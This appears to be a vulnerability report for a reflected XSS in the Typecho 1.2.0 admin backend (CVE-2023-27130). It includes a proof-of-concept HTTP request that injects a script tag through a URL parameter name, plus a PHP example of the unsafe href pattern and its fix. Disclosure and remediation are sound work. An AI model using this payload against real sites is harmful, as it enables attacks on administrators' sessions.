Headline
CVE-2023-27130: Typecho <= 1.2.0 Admin System with Reflected-XSS Vulnerability · Issue #1535 · typecho/typecho
Cross Site Scripting vulnerability found in Typecho v.1.2.0 allows a remote attacker to execute arbitrary code via an arbitrarily supplied URL parameter.
Typecho <= 1.2.0 Admin System with Reflected-XSS
Influenced Version
Typecho <= 1.2.0
Description
The Typecho admin backend management system has a reflected XSS in the name of an arbitrarily supplied URL parameter.
- Log in to the Typecho admin backend management system, on "/admin/index.php", "admin/themes.php" or "/admin/backup.php".
- The name of an arbitrarily supplied URL parameter, whether key or value, is injected into an HTML href attribute of an <a> tag.
POC
GET /typecho/admin/?"><script>alert(1)</script><!--bbb=1 HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Ftypecho%2Fadmin%2Findex.php%3Fr7ptu%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eat2f7%3D1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: e4dff44224c23efabc177d44e50b1de4__typecho_uid=1; e4dff44224c23efabc177d44e50b1de4__typecho_authCode=%24T%248O0qulQf98a49e06253d4ae8c93f478424457be4b; PHPSESSID=m7h7isuus6cugk6mb58vdah296
Connection: close
/admin/index.php
/admin/theme.php
/admin/backup.php
Reported by Srpopty, vulnerability discovered by using Corax.
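
The root cause described above (request URL text copied into an `href` attribute without output encoding) and its fix, as an added example that is not Typecho's own code. The function names `renderLinkUnsafe` and `renderLinkSafe` and the link text are hypothetical; the sample input is the request target from the POC above.

```php
<?php
// Added illustration, not Typecho source. Function names are hypothetical.

// Vulnerable pattern: the raw request URI is copied into an href attribute,
// so a double quote in a parameter name closes the attribute early.
function renderLinkUnsafe(string $requestUri): string
{
    return '<a href="' . $requestUri . '">Reload</a>';
}

// Hardened pattern: split off the query, re-encode every key and value,
// then HTML-escape the whole URL for the attribute context.
function renderLinkSafe(string $requestUri): string
{
    // Split on the first "?" only; a missing query becomes an empty string.
    [$path, $query] = array_pad(explode('?', $requestUri, 2), 2, '');

    // parse_str() URL-decodes names and values; http_build_query()
    // percent-encodes them again, including quotes and angle brackets.
    parse_str($query, $params);
    $url = $path;
    if ($params !== []) {
        $url .= '?' . http_build_query($params);
    }

    // ENT_QUOTES covers both quote styles; this also escapes the "&"
    // separators and anything unusual left in the path.
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $attr . '">Reload</a>';
}

// Sample input: the request target from the POC on this page.
$poc = '/typecho/admin/?"><script>alert(1)</script><!--bbb=1';

foreach (['renderLinkUnsafe', 'renderLinkSafe'] as $fn) {
    $html = $fn($poc);
    // A raw "<script" in the output means the markup escaped the attribute.
    $broken = strpos($html, '<script') !== false ? 'yes' : 'no';
    printf("%s: raw <script in output: %s\n  %s\n", $fn, $broken, $html);
}
```

Escaping at the point of output is the part that matters: re-encoding the query alone leaves the path unescaped, which is why `htmlspecialchars()` is applied to the assembled URL.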